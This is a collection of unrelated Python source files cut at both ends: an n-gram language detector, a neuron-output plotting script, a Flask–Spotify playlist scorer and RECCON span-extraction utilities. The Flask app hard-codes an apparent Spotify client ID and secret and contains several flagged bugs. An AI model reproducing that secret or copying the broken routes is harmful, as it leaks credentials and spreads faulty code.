         )
    """
    if not isinstance(text, str) or not text:
        return ()
    framed_sentences = []
    # split on sentence-ending punctuation that is followed by a space
    for raw_sentence in re.split('[!?.] ', text):
        # keep only lowercase letters, spaces and newlines, then tokenize
        words = re.sub('[^a-z \n]', '', raw_sentence.lower()).split()
        if not words:
            continue
        # a word is a str of chars, so tuple('_' + w + '_') frames it letter-wise
        framed_sentences.append(tuple(tuple('_' + word + '_') for word in words))
    return tuple(framed_sentences)
# 4
class LetterStorage:
    """Maps letters to unique integer ids (ids start at 1, in insertion order)."""

    def __init__(self):
        self.storage = {}

    def _put_letter(self, letter: str) -> int:
        """
        Puts a letter into storage, assigns a unique id
        :param letter: a letter
        :return: 0 if succeeds, 1 if not
        """
        if not isinstance(letter, str) or not letter:
            return 1
        # len(...) is evaluated before insertion, so the first id is 1
        self.storage.setdefault(letter, len(self.storage) + 1)
        return 0

    def get_id_by_letter(self, letter: str) -> int:
        """
        Gets a unique id by a letter
        :param letter: a letter
        :return: an id, or -1 for invalid/unknown letters
        """
        if isinstance(letter, str) and letter:
            return self.storage.get(letter, -1)
        return -1

    def update(self, corpus: tuple) -> int:
        """
        Fills a storage by letters from the corpus
        :param corpus: a tuple of sentences
        :return: 0 if succeeds, 1 if not
        """
        if not isinstance(corpus, tuple):
            return 1
        for sentence in corpus:
            for word in sentence:
                for symbol in word:
                    self._put_letter(symbol)
        return 0
# 6
def encode_corpus(storage: LetterStorage, corpus: tuple) -> tuple:
    """
    Encodes sentences by replacing letters with their ids
    :param storage: an instance of the LetterStorage class
    :param corpus: a tuple of sentences
    :return: a tuple of the encoded sentences (unknown letters encode as -1)
    """
    if not isinstance(storage, LetterStorage) or not isinstance(corpus, tuple):
        return ()
    return tuple(
        tuple(
            tuple(storage.get_id_by_letter(letter) for letter in word)
            for word in sentence
        )
        for sentence in corpus
    )
# 6
class NGramTrie:
    """Extracts and stores n-grams of encoded text, with frequencies and
    per-first-id conditional log-probabilities."""

    def __init__(self, n: int):
        self.size = n
        self.n_grams = ()
        self.n_gram_frequencies = {}
        self.n_gram_log_probabilities = {}

    def fill_n_grams(self, encoded_text: tuple) -> int:
        """
        Extracts n-grams from the given sentence, fills the field n_grams
        :param encoded_text: a tuple of sentences of tuples of encoded tokens
        :return: 0 if succeeds, 1 if not
        """
        if not isinstance(encoded_text, tuple):
            return 1
        self.n_grams = tuple(
            tuple(
                tuple(token[ind:ind + self.size]
                      for ind in range(len(token) - self.size + 1))
                for token in sentence
            )
            for sentence in encoded_text
        )
        return 0

    def calculate_n_grams_frequencies(self) -> int:
        """
        Fills in the n-gram storage from a sentence, fills the field n_gram_frequencies
        :return: 0 if succeeds, 1 if not
        """
        if not self.n_grams:
            return 1
        for sentence in self.n_grams:
            for token in sentence:
                for n_gram in token:
                    self.n_gram_frequencies[n_gram] = self.n_gram_frequencies.get(n_gram, 0) + 1
        return 0

    def calculate_log_probabilities(self) -> int:
        """
        Gets log-probabilities of n-grams, fills the field n_gram_log_probabilities
        :return: 0 if succeeds, 1 if not
        """
        if not self.n_gram_frequencies:
            return 1
        # Hoisted fix: the denominator (total frequency of all n-grams sharing
        # the same first id) was previously recomputed with a full scan for
        # every n-gram, making this O(n^2). Group the totals once instead.
        first_id_totals = {}
        for n_gram, freq in self.n_gram_frequencies.items():
            first_id_totals[n_gram[0]] = first_id_totals.get(n_gram[0], 0) + freq
        for n_gram, freq in self.n_gram_frequencies.items():
            self.n_gram_log_probabilities[n_gram] = log(freq / first_id_totals[n_gram[0]])
        return 0

    def top_n_grams(self, k: int) -> tuple:
        """
        Gets k most common n-grams
        :return: a tuple with k most common n-grams (ties keep insertion order)
        """
        if not isinstance(k, int) or k < 0:
            return ()
        top = sorted(self.n_gram_frequencies, key=self.n_gram_frequencies.get, reverse=True)
        return tuple(top[:k])
# 8
class LanguageDetector:
    """Detects a text's language by comparing top n-gram rankings per language."""

    def __init__(self, trie_levels: tuple = (2,), top_k: int = 10):
        self.trie_levels = trie_levels
        self.top_k = top_k
        self.n_gram_storages = {}

    def new_language(self, encoded_text: tuple, language_name: str) -> int:
        """
        Fills NGramTries with regard to the trie_levels field
        :param encoded_text: an encoded text
        :param language_name: a language
        :return: 0 if succeeds, 1 if not
        """
        if (not isinstance(encoded_text, tuple)
                or not isinstance(encoded_text[0], tuple)
                or not isinstance(language_name, str)):
            return 1
        level_storages = {}
        for level in self.trie_levels:
            trie = NGramTrie(level)
            trie.fill_n_grams(encoded_text)
            trie.calculate_n_grams_frequencies()
            trie.calculate_log_probabilities()
            level_storages[level] = trie
        self.n_gram_storages[language_name] = level_storages
        return 0

    @staticmethod
    def _calculate_distance(first_n_grams: tuple, second_n_grams: tuple) -> int:
        """
        Calculates distance between top_k n-grams
        :param first_n_grams: a tuple of the top_k n-grams
        :param second_n_grams: a tuple of the top_k n-grams
        :return: a distance, or -1 for invalid input
        """
        if not isinstance(first_n_grams, tuple) or not isinstance(second_n_grams, tuple):
            return -1
        if (first_n_grams and not isinstance(first_n_grams[0], (tuple, str))) \
                or (second_n_grams and not isinstance(second_n_grams[0], (tuple, str))):
            return -1
        total = 0
        for position, n_gram in enumerate(first_n_grams):
            try:
                # rank displacement when present in both rankings
                total += abs(second_n_grams.index(n_gram) - position)
            except ValueError:
                # n-gram missing from the second ranking: maximum penalty
                total += len(second_n_grams)
        return total

    def detect_language(self, encoded_text: tuple) -> dict:
        """
        Detects the language the unknown text is written in using the function _calculate_distance
        :param encoded_text: a tuple of sentences with tuples of tokens split into letters
        :return: a dictionary where a key is a language, a value - the distance
        """
        if not isinstance(encoded_text, tuple):
            return {}
        distances = {}
        for language, storages in self.n_gram_storages.items():
            per_level = []
            for level in self.trie_levels:
                candidate = NGramTrie(level)
                candidate.fill_n_grams(encoded_text)
                candidate.calculate_n_grams_frequencies()
                per_level.append(self._calculate_distance(
                    candidate.top_n_grams(self.top_k),
                    storages[level].top_n_grams(self.top_k)))
            if per_level:
                distances[language] = mean(per_level)
        return distances
# 10
class ProbabilityLanguageDetector(LanguageDetector):
    """Probability-based variant of LanguageDetector.

    NOTE(review): both methods below are unimplemented stubs (their bodies are
    ``pass``, so they implicitly return None rather than the documented float
    and dict).
    """

    def _calculate_sentence_probability(self, n_gram_storage: NGramTrie, sentence_n_grams: tuple) -> float:
        """
        Calculates sentence probability
        :param n_gram_storage: a filled NGramTrie with log-probabilities
        :param sentence_n_grams: n-grams from a sentence
        :return: a probability of a sentence
        """
        pass

    def detect_language(self, encoded_text: tuple) -> dict:
        """
        Detects the language the unknown sentence is written in using sentence probability in different languages
        :param encoded_text: a tuple of sentences with tuples of tokens split into letters
        :return: a dictionary with language_name: probability
        """
        pass
| StarcoderdataPython |
1740652 | import argparse
import sys
import numpy as np
import itertools
# visualization libraries
import matplotlib.pyplot as plt
import seaborn as sns
plt.style.use('classic')
import numpy as np
import pandas as pd
if __name__ == '__main__':
    # CLI: path to a saved numpy array of neuron activations plus the two
    # neuron indices to visualise.
    parser = argparse.ArgumentParser(description='Data Collector for neuron outputs')
    parser.add_argument('neuron_output_data_filepath', type=str, help='where is the neuron output data?')
    parser.add_argument('neuron1', type=int, help='1st neuron to analyze')
    parser.add_argument('neuron2', type=int, help='2nd neuron to analyze')
    args = parser.parse_args()
    neuronOutput = np.load(args.neuron_output_data_filepath)
    # after the transpose, neuronOutput[i] is the output series of neuron i
    neuronOutput = np.transpose(neuronOutput) # the neuron output needs to be transposed for covariance calculation
    # Joint KDE plot of the two selected neurons' output distributions.
    data = np.column_stack((neuronOutput[args.neuron1],neuronOutput[args.neuron2]))
    data = pd.DataFrame(data, columns=['neuron ' + str(args.neuron1) + ' stat distribution' , 'neuron ' + str(args.neuron2) + ' stat distribution'])
    with sns.axes_style('white'):
        sns.jointplot('neuron ' + str(args.neuron1) + ' stat distribution' , 'neuron ' + str(args.neuron2) + ' stat distribution', data, kind='kde');
    plt.savefig(fname = 'Distribution of ' + str(args.neuron1) + ' and ' + str(args.neuron2) + ' Neurons output')
    # clear the figure so the following histogram starts from a blank canvas
    plt.clf()
    # Per-neuron histogram + KDE for the first selected neuron.
    sns.distplot(neuronOutput[args.neuron1], hist=True, kde=True,
             bins=int(40), color = 'darkblue',
             hist_kws={'edgecolor':'black'},
             kde_kws={'linewidth': 4})
    plt.title('Histogram of ' + str(args.neuron1) + ' Neurons output')
    plt.xlabel('output')
    plt.ylabel('occurences')
    plt.savefig('Histogram of ' + str(args.neuron1) + ' Neurons output')
    plt.clf()
    # Per-neuron histogram + KDE for the second selected neuron.
    sns.distplot(neuronOutput[args.neuron2], hist=True, kde=True,
             bins=int(40), color = 'darkblue',
             hist_kws={'edgecolor':'black'},
             kde_kws={'linewidth': 4})
    plt.title('Histogram of ' + str(args.neuron2) + ' Neurons output')
    plt.xlabel('output')
    plt.ylabel('occurences')
    plt.savefig('Histogram of ' + str(args.neuron2) + ' Neurons output')
| StarcoderdataPython |
1946753 | <filename>app.py
import billboard
import spotipy
import os
from spotipy.oauth2 import SpotifyOAuth
from flask import Flask, session, request, redirect, render_template
from flask_session import Session
# Flask app setup with server-side (filesystem) sessions.
app = Flask(__name__)
app.config['SECRET_KEY'] = os.urandom(64)
app.config['SESSION_TYPE'] = 'filesystem'
app.config['SESSION_FILE_DIR'] = './.flask_session/'
Session(app)

scope = "user-library-read"

# NOTE(security): OAuth client credentials are hard-coded here and committed
# to source. Load them from the environment / secret storage instead, and
# rotate the exposed client secret.
os.environ['SPOTIPY_CLIENT_ID'] = '4ee59bcc14e443ce91bbfa177eb50c23' #Secrets found in the secrets.py folder
os.environ['SPOTIPY_CLIENT_SECRET'] = '34f6fefa1b6f4acc8ea11ee89c4df6d3'
os.environ['SPOTIPY_REDIRECT_URI'] = 'http://127.0.0.1:8080/login'

# module-level client using the OAuth env vars above
sp = spotipy.Spotify(auth_manager=SpotifyOAuth(scope=scope))

# Per-session Spotify token cache directory; created on first import.
caches_folder = './.spotify_caches/' #Cache path for clearing session
if not os.path.exists(caches_folder):
    os.makedirs(caches_folder)
def session_cache_path():
    """Path of this session's Spotify OAuth token cache, keyed by session uuid.

    NOTE(review): assumes ``session['uuid']`` was set earlier in the request
    flow (not visible in this file); raises TypeError otherwise — confirm.
    """
    return caches_folder + session.get('uuid') #Gets path
@app.route('/')
def main():
    """Landing page.

    NOTE(review): the name ``main`` is rebound by ``def main(inputplaylist)``
    near the bottom of this file. Flask keeps this view because routes bind
    at decoration time, but any later bare ``main(...)`` call hits the other
    function — consider renaming one of them.
    """
    return render_template('home.html') # initial path
# Module-level default playlist ID, used only for manual debugging runs.
input_playlist = '4Hbq8z7KWYVJtQQDVmN0Kf?si=HHr40zMuS7WTyJu6HoQ-fw' #ONLY USE FOR DEBUGGING
@app.route('/loading')
def optionselect():
    """Loading screen; requires a cached Spotify OAuth token."""
    auth_manager = spotipy.oauth2.SpotifyOAuth(cache_path=session_cache_path()) # gets token for OAuth
    if not auth_manager.get_cached_token():
        return redirect('/') # if no token, redirect back home
    return render_template('loading.html') # render loading.html
# NOTE(review): the route string contains a stray closing parenthesis, so this
# view is served at '/options)' — presumably '/options' was intended; confirm
# against the links in the templates before changing.
@app.route('/options)')
def optionselect2():
    """Options page; requires a cached Spotify OAuth token."""
    auth_manager = spotipy.oauth2.SpotifyOAuth(cache_path=session_cache_path()) # gets token for OAuth
    if not auth_manager.get_cached_token():
        return redirect('/') # if no token, redirect back home
    return render_template('options.html')
# NOTE(review): stray ')' in the route — presumably '/results' was intended.
@app.route('/results)')
def results():
    """Results page.

    NOTE(review): ``main()`` below is the module-level ``main(inputplaylist)``
    scoring function, which requires a playlist argument — calling it with no
    arguments raises TypeError at request time, and it returns None anyway
    (it only prints). This view cannot work as written; confirm intent.
    """
    auth_manager = spotipy.oauth2.SpotifyOAuth(cache_path=session_cache_path()) # gets token for OAuth
    if not auth_manager.get_cached_token():
        return redirect('/') # if no token, redirect back home
    return render_template('results.html',thing_one=main())
@app.route('/result')
def result():
    """Single-result page.

    NOTE(review): ``main(id)`` passes the Python builtin ``id`` function as
    the playlist argument, and ``main`` returns None (it only prints), so
    ``thing_one`` is always None. Presumably a playlist ID from the request
    was meant here — confirm.
    """
    return render_template('result.html',thing_one=main(id))
def getPlaylistID():
    """Return the ID of the current user's most recently listed playlist."""
    auth_manager = spotipy.oauth2.SpotifyOAuth(cache_path=session_cache_path())
    client = spotipy.Spotify(auth_manager=auth_manager)
    # limit=1/offset=0: only the first playlist in the user's list is needed
    playlists = client.user_playlists(user=get_user_id(), limit=1, offset=0)
    first_playlist = playlists['items'][0]
    return first_playlist['id']
def get_user_id():
    """Return the authenticated Spotify user's ID as a string."""
    auth_manager = spotipy.oauth2.SpotifyOAuth(cache_path=session_cache_path())
    client = spotipy.Spotify(auth_manager=auth_manager)
    return str(client.me()['id'])
def main(inputplaylist):
    """Score how many songs of a Spotify playlist charted on the Billboard
    Hot 100 in the month they were added, and print a "basic" percentage.

    NOTE(review): this rebinds the name ``main`` used by the '/' route above.
    """
    input_playlist = '4Hbq8z7KWYVJtQQDVmN0Kf?si=HHr40zMuS7WTyJu6HoQ-fw' #ONLY USE FOR DEBUGGING
    # playlists = sp.user_playlists('spotify')
    playlists = sp.playlist(playlist_id=inputplaylist, fields=None)
    songs = list()
    artists = list()
    dates = list()
    # Collect track name (stripped of any " (..." suffix), primary artist and
    # the year-month each track was added.
    for i in range(len(playlists['tracks']['items'])):
        if ' (' in playlists['tracks']['items'][i]['track']['name']:
            idx = playlists['tracks']['items'][i]['track']['name'].index(' (')
            songs.append(playlists['tracks']['items'][i]['track']['name'][:idx])
        else:
            songs.append(playlists['tracks']['items'][i]['track']['name'])
        artists.append(playlists['tracks']['items'][i]['track']['artists'][0]['name'])
        dates.append(playlists['tracks']['items'][i]['added_at'][:7])
    print(songs)
    print(artists)
    print(dates)
    newdate = list()
    # One Billboard Hot 100 chart per distinct year-month (network fetch).
    bill = {}
    for i in range(len(songs)):
        if dates[i] not in bill.keys():
            bill[dates[i]] = billboard.ChartData('hot-100', date=dates[i] + '-01', fetch=True, timeout=25)
    billsongs = list()
    billartist = list()
    count = 0
    # NOTE(review): this accumulates the full 100 chart entries for EVERY song
    # into one flat list (assumes each chart has 100 entries), and the later
    # membership test checks a song against charts of all months, not just its
    # own — confirm whether that cross-month matching is intended.
    for i in range(len(songs)):
        for j in range(100):
            billsongs.append(bill[dates[i]][j].title.lower())
            billartist.append(bill[dates[i]][j].artist.lower())
    # print(songs[i] + billsongs[i])
        # print(artists[i] + billartist[i])
        # if songs[i].lower() == billsongs[i].lower() and artists[i].lower() == billartist[i].lower():
        #     count += 1
    # Count playlist songs whose title appears anywhere in the collected
    # charts (artist is printed but not matched).
    for i in range(len(songs)):
        if (songs[i].lower() in billsongs):
            print(songs[i] + ' ' + artists[i] + ' ')
            print(billsongs[i] + ' ' + billartist[i] + ' ')
            count += 1
    # print(songs)
    # print(billsongs)
    print(count)
    print(len(songs))
    per = round((count/len(songs)* 100))
    print(per)
    print('You are ' + str(per) + '% basic')
    # total = len(songs)
    # print(total)
    # print(count/total)
    # print(playlists['tracks']['items'][1]['added_at'][:10])
# def main():
# chart = billboard.ChartData('hot-100')
# chart1 = billboard.ChartData('hot-100',date='2015-05-22',fetch=True, timeout=25)
# chart.title
# song = chart[0] # Get no. 1 song on chart
# print(chart1)
if __name__ == '__main__':
    # NOTE(review): runs the scoring routine once with the debug playlist;
    # the Flask app itself is never started here (no app.run()).
    main(inputplaylist='4Hbq8z7KWYVJtQQDVmN0Kf?si=HHr40zMuS7WTyJu6HoQ-fw')
3387006 | import math
import json
import pathlib
import argparse
import collections
from functools import partial
from typing import List, Dict, Tuple
import torch
import numpy as np
from tqdm import tqdm
from torch.utils.data import TensorDataset
from torch.functional import Tensor
from transformers.models.bert.tokenization_bert import BasicTokenizer
from transformers.data.processors.squad import (
SquadExample,
SquadFeatures,
squad_convert_example_to_features,
squad_convert_example_to_features_init,
)
from .tokenization import RecconSpanExtractionTokenizer
from .evaluate_squad import compute_f1
from .data_class import RecconSpanExtractionArguments
def parse_args_and_load_config(
    config_path: str = "config/span_extraction_config.json",
) -> RecconSpanExtractionArguments:
    """Get config from config file using argparser

    The ``--config`` path is resolved relative to this module's directory.

    Returns:
        RecconSpanExtractionArguments: RecconSpanExtractionArguments instance
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("--config", type=str, default=config_path)
    cli_args = parser.parse_args()
    cfg_file = pathlib.Path(__file__).parent / cli_args.config
    with cfg_file.open("r") as handle:
        cfg_dict = json.load(handle)
    return RecconSpanExtractionArguments(**cfg_dict)
def get_all_evidence_utterance_from_conversation(
    emotion: str, conversation_history: List[str]
) -> Dict[str, List[str]]:
    """Build one candidate row per utterance of a conversation, treating each
    utterance in turn as the evidence utterance.

    The last utterance of ``conversation_history`` is the target utterance;
    the whole history (space-joined) is repeated for every row. The output
    format matches what RecconSpanExtractionPreprocessor expects:

        {'emotion': ['happiness'],
        'target_utterance': ['......'],
        'evidence_utterance': ['......'],
        'conversation_history': ['......']}

    Args:
        emotion (str): Emotion of the target utterance
        conversation_history (List[str]): Utterances of a conversation; the
            last one is used as the target utterance.

    Returns:
        Dict[str, List[str]]: Parallel lists, one entry per utterance.
    """
    joined_history = " ".join(conversation_history)
    target_utterance = conversation_history[-1]
    num_rows = len(conversation_history)
    return {
        "emotion": [emotion] * num_rows,
        "target_utterance": [target_utterance] * num_rows,
        "evidence_utterance": list(conversation_history),
        "conversation_history": [joined_history] * num_rows,
    }
class RecconSpanExtractionData(torch.utils.data.Dataset):
    """Torch Dataset wrapper around a TensorDataset, as required by the
    Transformers Trainer.

    Args:
        dataset (TensorDataset): underlying tensor dataset. Rows must have
            6 tensors when ``for_predict`` is True, 8 tensors otherwise.
        for_predict (bool, optional): inference mode (no labels). Defaults to False.
    """

    def __init__(self, dataset: TensorDataset, for_predict: bool = False) -> None:
        self.dataset = dataset
        self.for_predict = for_predict

    def __getitem__(self, idx: int) -> Dict[str, torch.Tensor]:
        """Return the model inputs (and, in training mode, the span labels)
        for the instance at ``idx`` as a dict keyed by argument name.
        """
        record = self.dataset[idx]
        if self.for_predict:
            input_ids, attention_mask, token_type_ids, _, _, _ = record
            return {
                "input_ids": input_ids,
                "attention_mask": attention_mask,
                "token_type_ids": token_type_ids,
            }
        (input_ids, attention_mask, token_type_ids,
         start_positions, end_positions, _, _, _) = record
        return {
            "input_ids": input_ids,
            "attention_mask": attention_mask,
            "token_type_ids": token_type_ids,
            "start_positions": start_positions,
            "end_positions": end_positions,
        }

    def __len__(self) -> int:
        """Number of instances in the wrapped dataset."""
        return len(self.dataset)
class InputFeatures(object):
    """A single set of features of data.

    Pure data holder: every constructor argument is stored verbatim as an
    instance attribute of the same name.
    """

    def __init__(
        self,
        unique_id,
        example_index,
        doc_span_index,
        tokens,
        token_to_orig_map,
        token_is_max_context,
        input_ids,
        input_mask,
        segment_ids,
        cls_index,
        p_mask,
        paragraph_len,
        start_position=None,
        end_position=None,
        is_impossible=None,
    ):
        # Copy all constructor parameters onto the instance in one pass.
        params = dict(locals())
        del params["self"]
        for attr_name, attr_value in params.items():
            setattr(self, attr_name, attr_value)
def truncate_to_max_length(
    feature: List[SquadFeatures], max_length: int
) -> List[SquadFeatures]:
    """Clip the first feature's sequence fields to at most ``max_length`` tokens.

    Mutates ``feature[0]`` in place and returns the same list.

    Args:
        feature (List[SquadFeatures]): list of SquadFeatures (only the first
            element is truncated).
        max_length (int): maximum number of tokens to keep per field.

    Returns:
        List[SquadFeatures]: the (mutated) input list.
    """
    head = feature[0]
    for field in ("input_ids", "p_mask", "token_type_ids", "tokens", "attention_mask"):
        setattr(head, field, getattr(head, field)[:max_length])
    return feature
def squad_convert_examples_to_features(
    examples: List[SquadExample],
    tokenizer: RecconSpanExtractionTokenizer,
    max_seq_length: int,
    doc_stride: int,
    max_query_length: int,
    is_training: bool,
    padding_strategy: str = "max_length",
    tqdm_enabled: bool = True,
) -> Tuple[List[SquadFeatures], TensorDataset]:
    """Convert SquadExamples to features and a TensorDataset.

    Each example is tokenized via the transformers SQuAD helper, truncated to
    ``max_seq_length`` (first feature only, see ``truncate_to_max_length``),
    assigned example indexes and unique ids, and finally packed into tensors.

    Args:
        examples (List[SquadExample]): list of SquadExample
        tokenizer (RecconSpanExtractionTokenizer): RecconSpanExtractionTokenizer from sgnlp
        max_seq_length (int): set max_seq_length
        doc_stride (int): set doc_stride
        max_query_length (int): set max_query_length
        is_training (bool): include start/end label tensors when True
        padding_strategy (str, optional): set padding_strategy. Defaults to "max_length".
        tqdm_enabled (bool, optional): set tqdm_enabled. Defaults to True.
    Returns:
        Tuple[List[SquadFeatures], TensorDataset]: Contains list of SquadFeatures and TensorDataset
    """
    features = []

    # the transformers helper keeps the tokenizer in module state
    squad_convert_example_to_features_init(tokenizer)
    annotate_ = partial(
        squad_convert_example_to_features,
        max_seq_length=max_seq_length,
        doc_stride=doc_stride,
        max_query_length=max_query_length,
        padding_strategy=padding_strategy,
        is_training=is_training,
    )

    features = [
        truncate_to_max_length(annotate_(example), max_seq_length)
        for example in tqdm(examples, disable=not tqdm_enabled)
    ]

    # Flatten per-example feature lists and stamp sequential ids.
    new_features = []
    unique_id = 1000000000
    example_index = 0
    for example_features in tqdm(
        features,
        total=len(features),
        desc="add example index and unique id",
        disable=not tqdm_enabled,
    ):
        if not example_features:
            continue
        for example_feature in example_features:
            example_feature.example_index = example_index
            example_feature.unique_id = unique_id
            new_features.append(example_feature)
            unique_id += 1
        example_index += 1
    features = new_features
    del new_features

    # Convert to Tensors and build dataset
    all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)
    all_attention_masks = torch.tensor(
        [f.attention_mask for f in features], dtype=torch.long
    )
    all_token_type_ids = torch.tensor(
        [f.token_type_ids for f in features], dtype=torch.long
    )
    all_cls_index = torch.tensor([f.cls_index for f in features], dtype=torch.long)
    all_p_mask = torch.tensor([f.p_mask for f in features], dtype=torch.float)
    all_is_impossible = torch.tensor(
        [f.is_impossible for f in features], dtype=torch.float
    )

    if not is_training:
        # inference: a feature-index tensor replaces the label tensors
        all_feature_index = torch.arange(all_input_ids.size(0), dtype=torch.long)
        dataset = TensorDataset(
            all_input_ids,
            all_attention_masks,
            all_token_type_ids,
            all_feature_index,
            all_cls_index,
            all_p_mask,
        )
    else:
        all_start_positions = torch.tensor(
            [f.start_position for f in features], dtype=torch.long
        )
        all_end_positions = torch.tensor(
            [f.end_position for f in features], dtype=torch.long
        )
        dataset = TensorDataset(
            all_input_ids,
            all_attention_masks,
            all_token_type_ids,
            all_start_positions,
            all_end_positions,
            all_cls_index,
            all_p_mask,
            all_is_impossible,
        )

    return features, dataset
def get_examples(
    examples_to_process: List[Dict[str, torch.Tensor]], is_training: bool = True
) -> List[SquadExample]:
    """Convert a list of SQuAD-style dicts into SquadExample objects.

    Args:
        examples_to_process (List[Dict]): paragraphs, each with a ``context``
            and a ``qas`` list of question/answer dicts.
        is_training (bool, optional): when True, the first answer's text and
            start offset are used as labels; otherwise all answers are kept.

    Raises:
        TypeError: examples_to_process should be a list of examples.

    Returns:
        List[SquadExample]: list of SquadExample
    """
    if not isinstance(examples_to_process, list):
        raise TypeError("Input should be a list of examples.")

    squad_examples = []
    for paragraph in examples_to_process:
        context = paragraph["context"]
        for qa_entry in paragraph["qas"]:
            impossible = qa_entry.get("is_impossible", False)
            answer_text = None
            start_char = None
            answer_list = []
            if not impossible:
                if is_training:
                    first_answer = qa_entry["answers"][0]
                    answer_text = first_answer["text"]
                    start_char = first_answer["answer_start"]
                else:
                    answer_list = qa_entry["answers"]
            squad_examples.append(
                SquadExample(
                    qas_id=qa_entry["id"],
                    question_text=qa_entry["question"],
                    context_text=context,
                    answer_text=answer_text,
                    start_position_character=start_char,
                    title=None,
                    is_impossible=impossible,
                    answers=answer_list,
                )
            )
    return squad_examples
def load_examples(
    examples: List[Dict[str, torch.Tensor]],
    tokenizer: RecconSpanExtractionTokenizer,
    max_seq_length: int = 512,
    doc_stride: int = 512,
    max_query_length: int = 512,
    evaluate: bool = False,
    output_examples: bool = False,
) -> TensorDataset:
    """Convert raw SQuAD-style dicts into a TensorDataset.

    Args:
        examples (List[Dict[str, torch.Tensor]]): train data
        tokenizer (RecconSpanExtractionTokenizer): RecconSpanExtractionTokenizer from sgnlp
        max_seq_length (int, optional): set max_seq_length. Defaults to 512.
        doc_stride (int, optional): set doc_stride. Defaults to 512.
        max_query_length (int, optional): set max_query_length. Defaults to 512.
        evaluate (bool, optional): evaluation mode (no labels). Defaults to False.
        output_examples (bool, optional): also return examples/features. Defaults to False.

    Returns:
        TensorDataset: the converted data; when ``output_examples`` is True a
        ``(dataset, examples, features)`` tuple is returned instead.
    """
    squad_examples = get_examples(examples, is_training=not evaluate)
    features, dataset = squad_convert_examples_to_features(
        examples=squad_examples,
        tokenizer=tokenizer,
        max_seq_length=max_seq_length,
        doc_stride=doc_stride,
        max_query_length=max_query_length,
        is_training=not evaluate,
        tqdm_enabled=True,
    )
    if output_examples:
        return dataset, squad_examples, features
    return dataset
def calculate_results(truth, predictions, **kwargs):
    """Compare predicted answers against gold answers.

    A prediction is *correct* when it matches the gold answer exactly
    (after stripping), *similar* when one contains the other, and
    *incorrect* otherwise. Extra metric callables passed as keyword
    arguments are applied to (true_answers, predicted_answers) and merged
    into the result dict under their keyword name.

    Returns:
        tuple: (result dict with correct/similar/incorrect counts plus extra
        metrics, texts dict with the per-question breakdowns)
    """
    gold_answers = {}
    question_lookup = {}
    for paragraph in truth:
        for qa in paragraph["qas"]:
            gold_answers[qa["id"]] = qa["answers"][0]["text"] if qa["answers"] else ""
            question_lookup[qa["id"]] = qa["question"]

    correct_text, similar_text, incorrect_text = {}, {}, {}
    predicted_answers, true_answers = [], []
    for q_id, gold in gold_answers.items():
        predicted = predictions[q_id]
        predicted_answers.append(predicted)
        true_answers.append(gold)
        if predicted.strip() == gold.strip():
            correct_text[q_id] = gold
        elif predicted.strip() in gold.strip() or gold.strip() in predicted.strip():
            similar_text[q_id] = {
                "truth": gold,
                "predicted": predicted,
                "question": question_lookup[q_id],
            }
        else:
            incorrect_text[q_id] = {
                "truth": gold,
                "predicted": predicted,
                "question": question_lookup[q_id],
            }

    extra_metrics = {
        metric_name: metric_fn(true_answers, predicted_answers)
        for metric_name, metric_fn in kwargs.items()
    }

    result = {
        "correct": len(correct_text),
        "similar": len(similar_text),
        "incorrect": len(incorrect_text),
        **extra_metrics,
    }

    texts = {
        "correct_text": correct_text,
        "similar_text": similar_text,
        "incorrect_text": incorrect_text,
    }

    return result, texts
# Lightweight container for one model output: start/end logits keyed by the
# feature's unique_id (mirrors the original BERT SQuAD inference code).
RawResult = collections.namedtuple(
    "RawResult", ["unique_id", "start_logits", "end_logits"]
)
def to_list(tensor):
    """Detach ``tensor`` from the graph, move it to CPU, return a Python list."""
    detached = tensor.detach().cpu()
    return detached.tolist()
def _get_best_indexes(logits, n_best_size):
"""Get the n-best logits from a list."""
index_and_score = sorted(enumerate(logits), key=lambda x: x[1], reverse=True)
best_indexes = []
for i in range(len(index_and_score)):
if i >= n_best_size:
break
best_indexes.append(index_and_score[i][0])
return best_indexes
def _compute_softmax(scores):
"""Compute softmax probability over raw logits."""
if not scores:
return []
max_score = None
for score in scores:
if max_score is None or score > max_score:
max_score = score
exp_scores = []
total_sum = 0.0
for score in scores:
x = math.exp(score - max_score)
exp_scores.append(x)
total_sum += x
probs = []
for score in exp_scores:
probs.append(score / total_sum)
return probs
def get_best_predictions(
    all_examples,
    all_features,
    all_results,
    n_best_size,
    max_answer_length,
    do_lower_case,
    verbose_logging,
    version_2_with_negative,
    null_score_diff_threshold,
):
    """Assemble the n-best answer spans per example from raw model logits.

    Classic BERT-SQuAD n-best decoding: for every example, candidate
    (start, end) pairs are formed from the top start/end logits of each of
    its features, filtered for validity, de-tokenized and ranked by logit
    sum; softmax over the n-best logit sums yields per-answer probabilities.
    With ``version_2_with_negative`` the empty ("no answer") prediction is
    scored against ``null_score_diff_threshold``.

    Returns a list of dicts: {"id", "answer": [texts...], "probability": [...]}.
    """
    example_index_to_features = collections.defaultdict(list)
    for feature in all_features:
        example_index_to_features[feature.example_index].append(feature)

    unique_id_to_result = {}
    for result in all_results:
        unique_id_to_result[result.unique_id] = result

    _PrelimPrediction = collections.namedtuple(  # pylint: disable=invalid-name
        "PrelimPrediction",
        ["feature_index", "start_index", "end_index", "start_logit", "end_logit"],
    )

    all_predictions = collections.OrderedDict()
    all_nbest_json = collections.OrderedDict()
    scores_diff_json = collections.OrderedDict()

    for (example_index, example) in enumerate(all_examples):
        features = example_index_to_features[example_index]

        prelim_predictions = []
        # keep track of the minimum score of null start+end of position 0
        score_null = 1000000  # large and positive
        min_null_feature_index = 0  # the paragraph slice with min null score
        null_start_logit = 0  # the start logit at the slice with min null score
        null_end_logit = 0  # the end logit at the slice with min null score
        for (feature_index, feature) in enumerate(features):
            result = unique_id_to_result[feature.unique_id]
            start_indexes = _get_best_indexes(result.start_logits, n_best_size)
            end_indexes = _get_best_indexes(result.end_logits, n_best_size)
            # if we could have irrelevant answers, get the min score of irrelevant
            if version_2_with_negative:
                feature_null_score = result.start_logits[0] + result.end_logits[0]
                if feature_null_score < score_null:
                    score_null = feature_null_score
                    min_null_feature_index = feature_index
                    null_start_logit = result.start_logits[0]
                    null_end_logit = result.end_logits[0]
            for start_index in start_indexes:
                for end_index in end_indexes:
                    # We could hypothetically create invalid predictions, e.g., predict
                    # that the start of the span is in the question. We throw out all
                    # invalid predictions.
                    if start_index >= len(feature.tokens):
                        continue
                    if end_index >= len(feature.tokens):
                        continue
                    if start_index not in feature.token_to_orig_map:
                        continue
                    if end_index not in feature.token_to_orig_map:
                        continue
